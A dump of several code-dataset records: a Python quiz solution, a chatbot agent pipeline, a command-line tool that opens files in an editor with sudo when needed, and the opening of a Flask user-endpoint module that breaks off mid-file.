INPUT: 45\n# OUTPUT: 'YOU MADE 365 DOLLARS THIS WEEK'\n#\n# INPUT: 67\n# OUTPUT: 'YOU MADE 580 DOLLARS THIS WEEK'\n\nn = int(input())\nif n < 0 or n > 168:\n print('INVALID')\nelse:\n if n <= 40:\n total = n * 8\n elif n <= 50:\n total = (40 * 8) + (n - 40) * 9\n else:\n total = (40 * 8) + (10 * 9) + (n - 50) * 10\n print('YOU MADE {} DOLLARS THIS WEEK'.format(total))\n\n\n# >>>>>>>>>>>>>>>>>>>> Part 6 <<<<<<<<<<<<<<<<<<<<\n# Write a program that asks the user to enter a positive integer n.\n# Assuming that this integer is in seconds, your program should convert\n# the number of seconds into days, hours, minutes, and seconds and prints\n# them exactly in the format specified below.\n#\n# INPUT: 369121517\n# OUTPUT: '4272 days 5 hours 45 minutes 17 seconds'\n#\n# INPUT: 24680\n# OUTPUT: '0 days 6 hours 51 minutes 20 seconds'\n#\n# INPUT: 129600\n# OUTPUT: '1 days 12 hours 0 minutes 0 seconds'\n\nseconds = int(input())\ndays, seconds = divmod(seconds, 86400)\nhours, seconds = divmod(seconds, 3600)\nminutes, seconds = divmod(seconds, 60)\n\nprint('{} days {} hours {} minutes {} seconds'\n .format(days, hours, minutes, seconds))\n","sub_path":"quiz_2.py","file_name":"quiz_2.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"111403330","text":"\"\"\"\nThis module contains agents that gives text output on given input text\n\"\"\"\n\nimport os.path\nimport random\nimport math\nimport re\nfrom typing import List, Dict, Optional, Type, Tuple\nimport time\n\nfrom nltk import pos_tag\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n\nimport json_manager\nimport logger\nimport text_processing\n\nLOGGER = logger.get_logger(__file__)\n\nrandom.seed(int(time.time()))\n\n\nclass NounsFindingAgent:\n \"\"\"\n Class for agent that sends one of the predefined replies or nothing\n depending on nouns in the input\n \"\"\"\n\n def __init__(self, phrases_json_path: str, nouns_json_path: str):\n # load data from input json\n phrases_data = json_manager.read(phrases_json_path)\n\n # dictionary with words as keys\n # and array of sentences that contain these words\n self.noun_sentences: Dict[Optional[str], List[str]] = dict()\n\n # for sentences without nouns\n self.noun_sentences[None] = list()\n\n # iterating through phrases data and storing nouns with sentences\n for sentence, nouns in phrases_data.items():\n if nouns:\n for noun in nouns:\n # if the noun occurs the first time set an empty array\n if noun not in self.noun_sentences:\n self.noun_sentences[noun] = list()\n self.noun_sentences[noun].append(sentence)\n else:\n # add sentence without nouns\n self.noun_sentences[None].append(sentence)\n\n # load data from input json\n nouns_data = json_manager.read(nouns_json_path)\n\n # dictionary with stemmed forms as keys\n # and lists of possible nouns that can have this stemmed form as values\n self.stemmed_nouns: Dict[str, List[str]] = dict()\n\n for noun, stemmed in nouns_data.items():\n # if the stemmed form occurs the first time\n # add entry with an empty list\n if stemmed not in self.stemmed_nouns:\n self.stemmed_nouns[stemmed] = list()\n self.stemmed_nouns[stemmed].append(noun)\n\n def get_replies(self, input_text: str,\n black_list: Optional[List[str]] = None) -> Tuple[List[str]]:\n \"\"\"\n Returns possible text outputs by\n searching known nouns in the input text\n and giving predefined phrases as a reply\n :param input_text: text containing natural language\n :param black_list: replies to be 
omitted from possible variants\n        :return: possible reply variants\n        \"\"\"\n\n        if not input_text:\n            return list(),\n\n        words = word_tokenize(input_text)\n\n        stemmed_words = list(map(text_processing.stem, words))\n\n        reply_variants = list()\n\n        # getting reply variants by checking each word if it is known\n        for stemmed_word in stemmed_words:\n            if stemmed_word in self.stemmed_nouns:\n                LOGGER.info(f'\"{stemmed_word}\" is found in \"{input_text}\" text')\n                for noun in self.stemmed_nouns[stemmed_word]:\n                    # adding sentences with this noun\n                    reply_variants += self.noun_sentences[noun]\n\n        # omitting variants from black list (guard against black_list=None,\n        # which the Optional type hint allows)\n        if black_list:\n            reply_variants = list(filter(lambda x: x not in black_list, reply_variants))\n\n        return reply_variants,\n\n\nclass LearningAgent:\n    \"\"\"Agent that learns what to say\n    depending on user's evaluation of replies given by replying agent\"\"\"\n    _parts_of_speech = {\n        'noun': 'S',\n        'verb': 'V',\n        'personal pronoun': 'S-PRO',\n        'connecting words': 'CONJ',\n        'other': 'NONLEX'\n    }\n\n    def __init__(self, save_file_name: str):\n        \"\"\"\n        :param save_file_name: name of a json file to write learned information\n        \"\"\"\n\n        self.pattern_delimiter = '.* '\n\n        self.save_file_name = save_file_name\n\n        if os.path.isfile(save_file_name):\n            self.knowledge_base = json_manager.read(save_file_name)\n        else:\n            self.knowledge_base: Dict[str, Dict[str, List[str]]] = dict()\n            json_manager.write(self.knowledge_base, save_file_name)\n\n    def _is_simple(self, tagged_words: List[Tuple[str, str]]) -> bool:\n        # are there any punctuation symbols other than in the end?\n        punctuation_symbols = \\\n            list(filter(lambda tagged_word: tagged_word[1] == self._parts_of_speech['other'],\n                        tagged_words))\n        if len(punctuation_symbols) > 1 or len(punctuation_symbols) == 1 \\\n                and tagged_words[-1] != punctuation_symbols[0]:\n            return False\n\n        return True\n\n    def _make_pattern_from_sentence(self, sentence: str) -> Optional[str]:\n        \"\"\"\n        Makes regex pattern out of sentence\n        by getting all nouns, verbs and personal pronouns\n        and joining them into one string\n        :param sentence: input sentence\n        :return: regex string or None if it's impossible to make one\n        \"\"\"\n\n        parts_of_speech = list()\n\n        tagged = pos_tag(word_tokenize(sentence), lang='rus')\n\n        # is sentence simple?\n        if not self._is_simple(tagged):\n            return None\n\n        for word, tag in tagged:\n            if tag in [self._parts_of_speech['noun'], self._parts_of_speech['verb'],\n                       self._parts_of_speech['personal pronoun']]:\n                parts_of_speech.append(text_processing.stem(word))\n\n        # is there anything to make pattern from?\n        if not parts_of_speech:\n            return None\n\n        return self.pattern_delimiter.join(parts_of_speech)\n\n    def _make_patterns_from_sentence(self, sentence: str) -> List[str]:\n        \"\"\"\n        Makes regex patterns out of sentence\n        by splitting sentence into parts,\n        getting all nouns, verbs and personal pronouns out of each one\n        and joining them into one string\n        :param sentence: input sentence\n        :return: list of regex strings (may be empty)\n        \"\"\"\n\n        patterns = list()\n\n        tagged = pos_tag(word_tokenize(sentence), lang='rus')\n\n        # splitting sentence into parts and making a pattern out of each one\n        sub_sentence = list()\n\n        important_pos_tags = [self._parts_of_speech['noun'], self._parts_of_speech['verb'],\n                              self._parts_of_speech['personal pronoun']]\n        punct_and_conj_tags = [self._parts_of_speech['connecting words'], self._parts_of_speech['other']]\n        for i, tagged_word in enumerate(tagged):\n            word, tag = tagged_word\n            if tag in important_pos_tags:\n                
sub_sentence.append(text_processing.stem(word))\n if tag in punct_and_conj_tags or i == len(tagged) - 1:\n\n # do not allow a pattern with one word with length less than 3\n # or with more than 3 words to be created\n if sub_sentence and not (len(sub_sentence) == 1\n and len(sub_sentence[0]) < 3 or len(sub_sentence) > 3):\n patterns.append(self.pattern_delimiter.join(sub_sentence))\n sub_sentence = list()\n\n return patterns\n\n def learn(self, input_text: str, reply: str, right: bool) -> None:\n \"\"\"\n learns what is right or wrong to say\n :param input_text: text of input message\n :param reply: reply given by replying agent\n :param right: True if agent should learn that given combination of\n sentence pattern and reply is right or False if wrong\n :return: None\n \"\"\"\n\n # for right wrong cases\n key = 'replies' if right else 'black list'\n other_key = 'black list' if right else 'replies'\n\n sentences = sent_tokenize(input_text)\n\n # each sentence in the text is converted to regex pattern and the information\n # about right/wrong reply is added to knowledge base with this pattern as key\n for sentence in sentences:\n patterns = self._make_patterns_from_sentence(sentence)\n\n for pattern in patterns:\n if right:\n LOGGER.info(f'\"{pattern}\" is learned with reply \"{reply}\"')\n else:\n LOGGER.info(f'\"{pattern}\" is learned with prohibited reply \"{reply}\"')\n\n if pattern not in self.knowledge_base:\n self.knowledge_base[pattern] = dict()\n knowledge = self.knowledge_base[pattern]\n\n if key not in knowledge:\n knowledge[key] = list()\n\n if reply not in knowledge[key]:\n knowledge[key].append(reply)\n\n if other_key in knowledge and reply in knowledge[other_key]:\n # remove ALL occurrences of reply\n knowledge[other_key] = list(filter(lambda a: a != reply, knowledge[other_key]))\n\n json_manager.write(self.knowledge_base, self.save_file_name)\n\n def get_replies(self, input_text: str) -> Tuple[List[str], List[str]]:\n \"\"\"\n Gets allowed and prohibited replies by searching for patterns in knowledge base\n that match input text\n :param input_text: input text to search in\n :return: allowed and prohibited replies\n \"\"\"\n\n sentences = sent_tokenize(input_text)\n patterns = self.knowledge_base.keys()\n\n replies = list()\n black_list = list()\n\n # for each known pattern check if the input matches\n for sentence in sentences:\n for pattern in patterns:\n if re.search(pattern, input_text, re.I):\n LOGGER.info(f'\"{pattern}\" pattern is found in \"{sentence}\" sentence')\n\n # if there no replies for matched pattern but there are non-empty black list\n # then add this information\n if 'replies' in self.knowledge_base[pattern]:\n replies += self.knowledge_base[pattern]['replies']\n if 'black list' in self.knowledge_base[pattern]:\n black_list += self.knowledge_base[pattern]['black list']\n\n # removing replies from black list\n for wrong_reply in black_list:\n if wrong_reply in replies:\n # remove ALL occurrences of wrong reply from replies\n replies = list(filter(lambda a: a != wrong_reply, replies))\n\n return replies, black_list\n\n\nclass AgentPipeline:\n \"\"\"\n Pipeline that iteratively uses agents in order to get reply on input text\n \"\"\"\n\n def _agent_controller(self, **kwargs) -> Dict:\n \"\"\"\n Calls agent with arguments extracted from kwargs using agent callers\n and returns updated kwargs with new values that gives agent\n :param kwargs: arguments for agent caller\n 'reply': str\n Reply got from agent,\n 'black_list': List[str]\n Prohibited replies,\n 
'no_empty_reply': bool\n flag for omitting empty reply,\n 'agent': [LearningAgent, NounsFindingAgent]\n Agent that processes input and returns reply\n :return: updated kwargs\n \"\"\"\n\n updated_kwargs = kwargs.copy()\n\n agent_type = type(kwargs.get('agent', None))\n # value to be updated in kwargs\n result = self._kwargs_converter[agent_type](*(self._agent_callers[agent_type](**kwargs)),\n kwargs)\n\n for key, value in result.items():\n updated_kwargs[key] = value\n\n return updated_kwargs\n\n def __init__(self, *args: [LearningAgent, NounsFindingAgent]):\n \"\"\"\n :param args: agents that will be in pipeline\n \"\"\"\n self.agents = args\n\n # for adapting kwargs to arguments used by agents\n self._agent_adapters: Dict[Type, 'function'] = dict()\n self._agent_adapters[NounsFindingAgent] = lambda **kwargs: \\\n (kwargs.get('input_text', None),\n kwargs.get('black_list', None))\n self._agent_adapters[LearningAgent] = lambda **kwargs: (kwargs.get('input_text', None),)\n self._agent_adapters[RandomReplyAgent] = lambda **kwargs: \\\n (kwargs.get('reply_variants', None),\n kwargs.get('black_list', None),\n kwargs.get('no_empty_reply', False))\n self._agent_adapters[RatingLearningAgent] = lambda **kwargs: (kwargs.get('input_text', None),)\n self._agent_adapters[RatingRandomReplyAgent] = lambda **kwargs: (kwargs.get('rated_replies', None),\n kwargs.get('reply_variants', None),\n kwargs.get('black_list', None),\n kwargs.get('no_empty_reply', False))\n\n # for calling agents' methods that process input message\n self._agent_callers: Dict[Type, 'function'] = dict()\n self._agent_callers[NounsFindingAgent] = lambda **kwargs: \\\n kwargs.get('agent', None).get_replies(*self._agent_adapters[NounsFindingAgent](**kwargs))\n self._agent_callers[LearningAgent] = lambda **kwargs: \\\n kwargs.get('agent', None).get_replies(*self._agent_adapters[LearningAgent](**kwargs))\n self._agent_callers[RandomReplyAgent] = lambda **kwargs: \\\n kwargs.get('agent', None).get_reply(*self._agent_adapters[RandomReplyAgent](**kwargs))\n self._agent_callers[RatingLearningAgent] = lambda **kwargs: \\\n kwargs.get('agent', None).get_rated_replies(*self._agent_adapters[RatingLearningAgent](**kwargs))\n self._agent_callers[RatingRandomReplyAgent] = lambda **kwargs: \\\n kwargs.get('agent', None).get_rated_reply(*self._agent_adapters[RatingRandomReplyAgent](**kwargs))\n\n # for converting agent's output to kwargs parameter(s)\n self._kwargs_converter: Dict[Type, 'function'] = dict()\n self._kwargs_converter[NounsFindingAgent] = lambda replies, kwargs: \\\n {'reply_variants': kwargs['reply_variants'] + replies}\n self._kwargs_converter[LearningAgent] = lambda replies, black_list, kwargs: \\\n {'reply_variants': kwargs['reply_variants'] + replies,\n 'black_list': kwargs['black_list'] + black_list}\n self._kwargs_converter[RandomReplyAgent] = lambda reply, kwargs: \\\n {'reply': reply}\n self._kwargs_converter[RatingLearningAgent] = lambda rated_replies, kwargs: \\\n {'rated_replies': rated_replies}\n self._kwargs_converter[RatingRandomReplyAgent] = lambda reply, kwargs: \\\n {'reply': reply}\n\n def get_reply(self, input_text: str, no_empty_reply: bool = False) -> Optional[str]:\n \"\"\"\n Passes arguments through each of agents and\n returns reply on input text\n :param input_text: input text\n :param no_empty_reply: flag that indicates must there be a mandatory non-empty reply or not\n is mandatory and False otherwise\n :return: text reply on input text or None if there are no reply on given input\n \"\"\"\n\n # initial values 
for kwargs\n        init_kwargs = {\n            'reply': None,\n            'reply_variants': list(),\n            'rated_replies': dict(),\n            'input_text': input_text,\n            'no_empty_reply': no_empty_reply,\n            'black_list': list()\n        }\n\n        kwargs = init_kwargs\n\n        # iterating through agents and passing kwargs through each one\n        for agent in self.agents:\n            kwargs['agent'] = agent\n\n            # update kwargs by assignment new value got from agent\n            kwargs = self._agent_controller(**kwargs)\n\n        return kwargs.get('reply', None)\n\n\nclass RatingLearningAgent(LearningAgent):\n    \"\"\"\n    Learning agent with rating system for replies\n    \"\"\"\n\n    def __init__(self, save_file_name: str, predecessor_save_file: str = \"\"):\n        if not os.path.isfile(save_file_name) and os.path.isfile(predecessor_save_file):\n            super().__init__(predecessor_save_file)\n            self.__recreate_knowledge_base(save_file_name)\n        else:\n            super().__init__(save_file_name)\n\n    def __recreate_knowledge_base(self, path_to_base_file) -> None:\n        \"\"\"\n        recreates knowledge base from predecessor's base and writes it as json file\n        :param path_to_base_file: path to the new base json file\n        :return: None\n        \"\"\"\n\n        # initial values for replies from predecessor\n        init_good_reply_val = 5\n        init_bad_reply_val = -5\n\n        old_base = self.knowledge_base\n        new_knowledge_base: Dict[str, Dict[str, int]] = dict()\n        for pattern, rules in old_base.items():\n            if pattern not in new_knowledge_base:\n                new_knowledge_base[pattern]: Dict[str, int] = dict()\n            for reply in rules.get('replies', []):\n                new_knowledge_base[pattern][reply] = init_good_reply_val\n            for reply in rules.get('black list', []):\n                new_knowledge_base[pattern][reply] = init_bad_reply_val\n        self.knowledge_base = new_knowledge_base\n        self.save_file_name = path_to_base_file\n        json_manager.write(self.knowledge_base, path_to_base_file)\n\n    def rating_learn(self, input_text: str, reply: str, rating_change: int) -> None:\n        \"\"\"\n        Learns patterns made from the input text and the corresponding reply\n        by rating pairs of patterns and replies\n        :param input_text: text that the bot received\n        :param reply: reply that the bot gave\n        :param rating_change: how much rating should be increased or decreased\n        :return: None\n        \"\"\"\n\n        sentences = sent_tokenize(input_text)\n\n        for sentence in sentences:\n            patterns = self._make_patterns_from_sentence(sentence)\n\n            for pattern in patterns:\n                if pattern not in self.knowledge_base:\n                    self.knowledge_base[pattern] = dict()\n\n                knowledge = self.knowledge_base[pattern]\n                knowledge[reply] = knowledge.get(reply, 0) + rating_change\n\n                LOGGER.info(f'pattern {pattern} is learned with reply {reply} with rating {knowledge[reply]}')\n\n        json_manager.write(self.knowledge_base, self.save_file_name)\n\n    def get_rated_replies(self, input_text: str) -> Tuple[Dict[str, int]]:\n        \"\"\"\n        Gets rated replies on given input text\n        :param input_text: text message from user\n        :return: replies and corresponding rating\n        \"\"\"\n        result = dict()\n        all_patterns = list(self.knowledge_base.keys())\n        found_patterns = list(filter(lambda pattern: re.search(pattern, input_text, re.I), all_patterns))\n        for found_pattern in found_patterns:\n            LOGGER.info(f'pattern {found_pattern} is found in text {input_text}')\n            for reply, rating in self.knowledge_base[found_pattern].items():\n                result[reply] = result.get(reply, 0) + rating\n\n        return result,\n\n\nclass RandomReplyAgent:\n    \"\"\"\n    Agent that chooses random replies from given ones\n    \"\"\"\n\n    def __init__(self, path_to_phrases: str):\n        # both conditions must hold, so this is a conjunction, not a disjunction\n        if not (path_to_phrases and os.path.isfile(path_to_phrases)):\n            
LOGGER.error('wrong phrases path for RandomReplyAgent')\n return\n\n self._all_phrases = list(json_manager.read(path_to_phrases).keys())\n self._max_weight = 1024\n # for multiplying weight of a given reply\n self.__given_reply_multiplier = 2\n self.__random_reply_divisor = 2\n self._phrases_weights: Dict[str, int] = dict()\n for phrase in self._all_phrases:\n self._phrases_weights[phrase] = self._max_weight\n\n def _decrease_weight(self, reply) -> None:\n \"\"\"\n Decreases weight of a phrase that was used as a reply last time\n :param reply: reply phrase\n :return: None\n \"\"\"\n if reply:\n self._phrases_weights[reply] = round(math.sqrt(self._phrases_weights[reply]))\n if self._phrases_weights[reply] < 2:\n self._phrases_weights[reply] = self._max_weight\n\n def get_reply(self, replies: List[str], black_list: List[str],\n no_empty_reply: bool) -> Tuple[Optional[str]]:\n \"\"\"\n Gets random reply or nothing if there are no possible replies\n :param replies: given replies\n :param black_list: prohibited replies\n :param no_empty_reply: flag to indicate that there must be a non-empty reply\n as a returned value\n :return: one chosen reply or None\n \"\"\"\n if replies:\n if no_empty_reply:\n k = 1\n else:\n k = math.floor(len(replies) / 2)\n\n # adding a random number of additional phrases\n # depending on no_empty_reply parameter\n random_replies = random.choices(list(filter(lambda x: x not in replies,\n self._all_phrases)), k=k)\n possible_replies = replies + random_replies\n else:\n possible_replies = self._all_phrases if no_empty_reply else list()\n\n # omitting phrases from black list\n if black_list:\n possible_replies = list(filter(lambda x: x not in black_list, possible_replies))\n\n # choosing the reply depending on how many times it was used before\n # and if it is in replies\n if possible_replies:\n reply = random.choices(possible_replies, weights=list(map(\n lambda phrase:\n self._phrases_weights[phrase] * self.__given_reply_multiplier if phrase in replies else\n self._phrases_weights[phrase], possible_replies)))[0]\n else:\n reply = None\n\n # decreasing weight of a chosen reply\n self._decrease_weight(reply)\n\n return reply,\n\n\nclass RatingRandomReplyAgent(RandomReplyAgent):\n \"\"\"Agent that chooses reply for and input text randomly\n and takes into account given rated replies\"\"\"\n\n def __init__(self, path_to_phrases: str):\n super().__init__(path_to_phrases)\n\n @staticmethod\n def __get_rated_weight(rating, weight):\n if rating >= 0:\n rated_weight = round(math.log(rating + math.e) * weight)\n else:\n rated_weight = round(weight * 4 ** rating)\n return 0 if rated_weight < 0 else rated_weight\n\n def get_rated_reply(self, rated_replies: Dict[str, int], replies: List[str], black_list: List[str],\n no_empty_reply: bool) -> Tuple[Optional[str]]:\n \"\"\"\n Gets random reply from given rated and regular replies and all phrases\n :param rated_replies: replies with rating\n :param replies: replies without rating\n :param black_list: replies that should not be chosen\n :param no_empty_reply: flag that indicates must there be a mandatory non-empty reply or not\n :return: reply on None if it's not possible to get a reply\n \"\"\"\n possible_replies: List[str] = list()\n\n # if there are no rated replies with positive rating\n # then there must be regular replies\n if replies or rated_replies:\n possible_replies = \\\n list(set(filter(lambda x: x not in black_list, replies + list(filter(lambda x: rated_replies[x] >= 0,\n list(rated_replies.keys()))))))\n\n # adding one 
random phrase\n        # take [0]: random.choices returns a one-element list, which is always truthy\n        if possible_replies and random.choices([True, False], weights=[1, 4])[0]:\n            possible_replies += random.choices(list(filter(lambda x: (not black_list or x not in black_list) and\n                                                           (not replies or x not in replies)\n                                                           and (not rated_replies or x not in rated_replies),\n                                                           self._all_phrases)))\n\n        if no_empty_reply and not possible_replies:\n            possible_replies = list(filter(lambda x: x not in black_list, self._all_phrases))\n\n        if possible_replies:\n            reply = random.choices(possible_replies,\n                                   list(map(lambda x:\n                                            self.__get_rated_weight(rated_replies.get(x, 0),\n                                                                    self._phrases_weights.get(x, 0)),\n                                            possible_replies)))[0]\n        else:\n            reply = None\n\n        self._decrease_weight(reply)\n\n        return reply,\n\n\nclass MessagesCounter:\n    \"\"\"For control of messages frequency of the bot\"\"\"\n\n    # minimum number of messages between bot's replies\n    messages_period = 100\n    # number of all messages that bot received\n    messages_num = 0\n\n    def count_and_check(self) -> bool:\n        \"\"\"\n        increases number of received messages and checks if it is more than period\n        :return: is messages number more than period?\n        \"\"\"\n        self.messages_num += 1\n        return self.messages_num > self.messages_period\n\n    def reset(self) -> None:\n        \"\"\"\n        resets counter\n        :return: None\n        \"\"\"\n        self.messages_num = 0\n\n\nclass TextCallChecker:\n    \"\"\"\n    Checks if the text contains the calling construction\n    \"\"\"\n\n    def __init__(self):\n        self.names = frozenset([\n            'рей',\n            'аянами',\n            'рей аянами',\n            'аянами рей'\n        ])\n\n    def check(self, text) -> bool:\n        \"\"\"\n        checks if the text contains the calling construction\n        using regex searching with names\n        :param text: text to check\n        :return: True if text contains the construction else False\n        \"\"\"\n        punct_symbols_string = r'\\\,\\\.\\\!\\\?'\n\n        text = text.replace(\"\\n\", \"\")\n\n        for name in self.names:\n            regex_strings = [\n                f'^{name}$',\n                f'^{name}[{punct_symbols_string}]',\n                f'[{punct_symbols_string}] {name}\\\\?'\n            ]\n\n            for regex_s in regex_strings:\n                if re.search(regex_s, text, re.I):\n                    return True\n\n        return False\n\n\nclass ConversationController:\n    \"\"\"\n    Controls how bot should reply on a given message depending on its source\n    \"\"\"\n\n    def __init__(self, agent_pipeline: AgentPipeline):\n        self._messages_counter = MessagesCounter()\n        self._call_checker = TextCallChecker()\n\n        self._agent_pipeline = agent_pipeline\n\n    @staticmethod\n    def _is_question(text) -> bool:\n        return True if re.search(r'\\?', text) else False\n\n    def proceed_input_message(self, input_text: str,\n                              is_private: bool = False,\n                              is_call: bool = False) -> Optional[str]:\n        \"\"\"\n        chooses parameters for agent pipeline depending on\n        message source type (private or group) and message content\n        :param input_text: text of the message\n        :param is_private: is the message private?\n        :param is_call: does the message contain the calling construction?\n        :return: reply on message or None\n        \"\"\"\n        is_call = is_call or self._call_checker.check(input_text)\n        no_empty_reply = True if is_call or is_private and (self._is_question(input_text)\n                                                            or random.choices([True, False], weights=[2, 1])[\n                                                                0]) else False\n\n        if is_call or is_private or random.choices([True, False], [1, 29])[0]:\n            reply = self._agent_pipeline.get_reply(input_text, no_empty_reply=no_empty_reply)\n            if reply:\n                self._messages_counter.reset()\n\n            return reply\n\n        return None\n
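\n# Editor's note: a minimal, illustrative wiring of the classes above (the file\n# names 'knowledge.json' and 'phrases.json' are assumptions, not taken from\n# this module):\n#\n#     pipeline = AgentPipeline(RatingLearningAgent('knowledge.json'),\n#                              RatingRandomReplyAgent('phrases.json'))\n#     controller = ConversationController(pipeline)\n#     print(controller.proceed_input_message('привет', is_private=True))\n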
None\n","sub_path":"texting_ai.py","file_name":"texting_ai.py","file_ext":"py","file_size_in_byte":28008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"629652612","text":"#!/usr/bin/env python3\n'''\n cedit.py\n Opens proper editor based on file extension..\n Checks file permissions, asks for root access if needed..\n\nCreated on Jan 19, 2013\n\n@author: cj\n'''\nfrom __future__ import print_function\nimport os\nimport stat\nimport sys\n\nfrom docopt import docopt\nfrom easysettings import EasySettings\nif sys.version_info.major < 3:\n input = raw_input\n\n\nNAME = 'CEdit'\n__version__ = '2.0.1'\nVERSIONSTR = '{} v. {}'.format(NAME, __version__)\nSCRIPT = os.path.split(os.path.abspath(sys.argv[0]))[1]\nSCRIPTDIR = os.path.abspath(sys.path[0])\nOPTIONS = {\n 'editor': 'editor to open files.',\n 'elevcmd': 'elevation command for when root is needed.'\n}\nsettings = EasySettings(os.path.join(SCRIPTDIR, 'cedit.conf'))\n\nUSAGESTR = \"\"\"{ver}\n\n Opens files with your favorite editor,\n and uses an elevation command automatically when needed for\n write access.\n\n Usage:\n {script} -h | -l | -v\n {script} -s option...\n {script} FILENAME\n\n Options:\n FILENAME : File name to open or create.\n -h,--help : shows this message\n -l,--list : lists current settings\n -s option,--set option : sets a {name} option\n current options are:\n editor=[path to editor]\n elevcmd=[path to elevation command]\n to set default editor:\n {script} -s editor=gedit\n to set default elevation command:\n {script} -s elevcmd=sudo\n -v,--version : Show cedit version and exit.\n\n {name} will look for a config file in: {scriptdir}\n\"\"\".format(name=NAME, script=SCRIPT, scriptdir=SCRIPTDIR, ver=VERSIONSTR)\n\n\ndef main(argd):\n \"\"\" Main entry point for cedit \"\"\"\n\n settings.configfile_exists()\n\n if argd['--list']:\n configopts = settings.list_settings()\n if not configopts:\n print('No settings configured.')\n return 1\n print('Current cedit settings:')\n print(' {}'.format('\\n '.join(\n '{:>8}: {}'.format(k, v) for k, v in configopts)))\n return 0\n elif argd['--set']:\n return 0 if set_option(argd['--set']) else 1\n\n if not os.path.exists(argd['FILENAME']):\n print('Path does not exist: {}'.format(argd['FILENAME']))\n sres = input('Would you like to use it anyway? (y/n): ')\n if not sres.lower().startswith('y'):\n print('Quitting...\\n')\n exit(0)\n\n return 0 if shell_file(argd['FILENAME']) else 1\n\n\ndef get_editor():\n if not settings.get('editor'):\n # no editor set\n print('\\n' / join((\n 'Be sure to set your favorite editor with:',\n ' cedit -s editor=[path_to_editor]'\n )))\n # look for common editor\n lst_editors = ['kate', 'gedit', 'leafpad', 'kwrite']\n for editor in lst_editors:\n spath = os.path.join('/usr/bin/', editor)\n if os.path.isfile(spath) or os.path.islink(spath):\n print('Found common editor: {}'.format(spath))\n return spath\n print('\\n'.join((\n 'No common editors found!',\n 'You must set one using the above command.'\n )))\n exit(1)\n else:\n editor = settings.get('editor')\n if os.path.isfile(editor) or os.path.islink(editor):\n return editor\n else:\n # try /usr/bin\n spath = os.path.join('/usr/bin', editor)\n if os.path.isfile(spath) or os.path.islink(spath):\n return spath\n print('\\n'.join((\n 'Cannot find editor! 
def get_elevcmd():\n    if not settings.get('elevcmd'):\n        # no elevation command set\n        print('\\n'.join((\n            'Be sure to set your favorite elevation command with:',\n            '    cedit -s elevcmd=[elevation command]'\n        )))\n        # look for common elevation command\n        lst_elevs = ['kdesudo', 'gksudo', 'sudo']\n        for elevcmd in lst_elevs:\n            spath = os.path.join('/usr/bin/', elevcmd)\n            if os.path.isfile(spath) or os.path.islink(spath):\n                print(\"Found common elevation cmd: \" + spath)\n                return spath\n        print('\\n'.join((\n            'No common elevation commands found!',\n            'You must set one using the above command.'\n        )))\n        sys.exit(1)\n    else:\n        elevcmd = settings.get('elevcmd')\n        if os.path.isfile(elevcmd) or os.path.islink(elevcmd):\n            return elevcmd\n        else:\n            # try /usr/bin\n            spath = os.path.join('/usr/bin', elevcmd)\n            if os.path.isfile(spath) or os.path.islink(spath):\n                return spath\n        print('\\n'.join((\n            'Cannot find elevcmd!',\n            'Make sure you set a valid elevation command with:',\n            '    cedit -s elevcmd=[elevcmd or /path/to/elevcmd]'\n        )))\n        sys.exit(1)\n\n\ndef set_option(args):\n    for sarg in args:\n        try:\n            sopt, sval = (s.lower().strip() for s in sarg.split('='))\n        except ValueError:\n            print('Invalid config option given: {}'.format(sarg))\n            return False\n\n        if sopt not in OPTIONS:\n            print('{} is not a valid option!'.format(sopt))\n            print('Accepted options are:')\n            for opt, desc in OPTIONS.items():\n                print('    {}: {}'.format(opt, desc))\n            sys.exit(1)\n        if (not os.path.isfile(sval)) and (not os.path.islink(sval)):\n            spath = os.path.join('/usr/bin/', sval)\n            if (not os.path.isfile(spath)) and (not os.path.islink(spath)):\n                print('Cannot set option \\'{}\\', path not found: {}'.format(\n                    sopt, sval\n                ))\n                sys.exit(1)\n            else:\n                sval = spath\n\n        if settings.get(sopt) == sval:\n            print('{} already set to: {}'.format(sopt, sval))\n            sys.exit(1)\n        # valid setting, set it\n        settings.setsave(sopt, sval)\n        print('    set {} = {}'.format(sopt, sval))\n    return True\n\n\ndef needs_root(sfilename):\n    \"\"\" Return True if a file needs root write permissions. 
\"\"\"\n try:\n if os.access(sfilename, os.W_OK):\n # User already has write access.\n return False\n # File is owned by root?\n return (os.stat(sfilename).st_uid == 0)\n except OSError:\n # TODO: Some logging is needed here.\n return True\n\n\ndef shell_file(sfilename):\n editor = get_editor()\n if not editor.startswith(\"/\"):\n editor = '/usr/bin/{}'.format(editor)\n if not os.path.isfile(editor):\n print('Editor not found!: {}'.format(editor))\n return False\n\n print('Using editor: {}'.format(editor))\n if os.path.isfile(sfilename):\n filetype = 'file'\n elif os.path.isdir(sfilename):\n filetype = 'directory'\n else:\n filetype = 'an unknown type'\n print('Opening {}...'.format(filetype))\n if needs_root(sfilename):\n # root style.\n elevcmd = get_elevcmd()\n cmd = [elevcmd, editor, sfilename]\n print('Using elevation command...')\n else:\n # normal style, no root.\n cmd = [editor, sfilename]\n try:\n # try running\n run_exec(cmd)\n print('Ran {}'.format(' '.join(cmd)))\n except Exception as ex:\n print('Unable to run command: {}\\nError: {}'.format(\n ' '.join(cmd),\n ex))\n return False\n return True\n\n\ndef run_exec(cmdlist):\n # runs a command with arguments.\n os.system(' '.join(cmdlist))\n\nif __name__ == '__main__':\n sys.exit(main(docopt(USAGESTR, version=VERSIONSTR)))\n","sub_path":"projects/static/files/cedit/cedit.py","file_name":"cedit.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"218474529","text":"import json\r\n\r\nfrom flask import Blueprint, request, jsonify\r\nfrom PIL import Image\r\n\r\nfrom util.exception import (\r\n ALLOWED_EXTENSIONS,\r\n ExistsException,\r\n NotExistsException,\r\n InvalidValueException,\r\n PermissionException,\r\n PathParameterException,\r\n FileException,\r\n RequestException\r\n)\r\nfrom util.validation import KeywordValidation\r\nfrom db_connection import db_connection, s3_connection\r\nfrom util.decorator import login_decorator\r\nfrom werkzeug.exceptions import RequestEntityTooLarge\r\n\r\n\r\ndef user_endpoints(user_service):\r\n user_app = Blueprint('user_app', __name__, url_prefix='/user')\r\n keyword_validation = KeywordValidation()\r\n\r\n def allowed_file(filename):\r\n return '.' 
